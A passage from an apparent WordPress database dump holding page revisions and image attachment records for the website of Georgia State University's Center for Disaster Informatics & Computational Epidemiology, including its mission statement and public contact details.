align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c11-outer\">\n <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c12\" class=\"h-global-transition-all h-heading style-288 style-local-122-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c12\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-289 style-local-122-c13 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c13\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-290 style-local-122-c14 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n partners; and local communities. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c15-outer\">\n <div data-colibri-id=\"122-c15\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c15 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c4-outer\">\n <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-324 style-local-122-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-324 style-local-122-c5\">\n <!---->\n <!---->\n <h4 class=\"\">Our Mission</h4>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"122-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c7-outer\">\n <div data-colibri-id=\"122-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c8\" class=\"h-text h-text-component style-319 style-local-122-c8 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c20\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-04-08 11:39:15','2022-04-08 15:39:15','',122,'https://gsudice.dataconn.net/?p=945',0,'revision','',0),(958,1,'2022-04-08 11:45:31','2022-04-08 15:45:31','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c5\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus. <\\/p><p>Phone: (404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c7\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','inherit','closed','closed','','546-revision-v1','','','2022-04-08 11:45:31','2022-04-08 15:45:31','',546,'https://gsudice.dataconn.net/?p=958',0,'revision','',0),(959,1,'2022-04-08 11:45:31','2022-04-08 15:45:31','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-400 style-local-185-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-400 style-local-185-c5\">\n <!---->\n <!---->\n <h2 class=\"\">Contact Us</h2>\n </div>\n </div>\n <div data-colibri-id=\"185-c6\" class=\"h-text h-text-component style-401 style-local-185-c6 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus. </p>\n <p>Phone: (404) 919-0757\n <br>Email: dice@cs.gsu.edu</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c7-outer\">\n <div data-colibri-id=\"185-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-04-08 11:45:31','2022-04-08 15:45:31','',185,'https://gsudice.dataconn.net/?p=959',0,'revision','',0),(965,1,'2022-04-14 10:12:24','2022-04-14 14:12:24','','Emma','','inherit','open','closed','','emma','','','2022-04-14 10:12:24','2022-04-14 14:12:24','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/Emma.jpg',0,'attachment','image/jpeg',0),(966,1,'2022-04-14 10:12:33','2022-04-14 14:12:33','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg','cropped-Emma.jpg','','inherit','open','closed','','cropped-emma-jpg','','','2023-10-13 10:06:24','2023-10-13 14:06:24','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg',0,'attachment','image/jpeg',0),(974,1,'2022-04-14 10:22:43','2022-04-14 14:22:43','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp','cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp','','inherit','open','closed','','cropped-cropped-cropped-cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-1-webp','','','2022-04-14 10:22:43','2022-04-14 14:22:43','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp',0,'attachment','image/webp',0),(976,1,'2022-04-14 10:22:49','2022-04-14 14:22:49','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c11\",\"index\":0,\"id\":\"122-c12\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c15\",\"parentId\":\"122-c14\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c14\",\"parentId\":\"122-c13\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c9\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-04-14 10:22:49','2022-04-14 14:22:49','',353,'https://gsudice.dataconn.net/?p=976',0,'revision','',0),(977,1,'2022-04-14 10:22:49','2022-04-14 14:22:49','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c5\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c6\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n partners; and local communities. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c9 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c10 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c11-outer\">\n <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c12\" class=\"h-global-transition-all h-heading style-324 style-local-122-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-324 style-local-122-c12\">\n <!---->\n <!---->\n <h4 class=\"\">Our Mission</h4>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"122-c13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c13 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c14-outer\">\n <div data-colibri-id=\"122-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c15\" class=\"h-text h-text-component style-319 style-local-122-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c20\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-04-14 10:22:49','2022-04-14 14:22:49','',122,'https://gsudice.dataconn.net/?p=977',0,'revision','',0),(982,1,'2022-04-14 11:23:06','2022-04-14 15:23:06','','disaster','','inherit','open','closed','','disaster','','','2022-04-14 11:23:06','2022-04-14 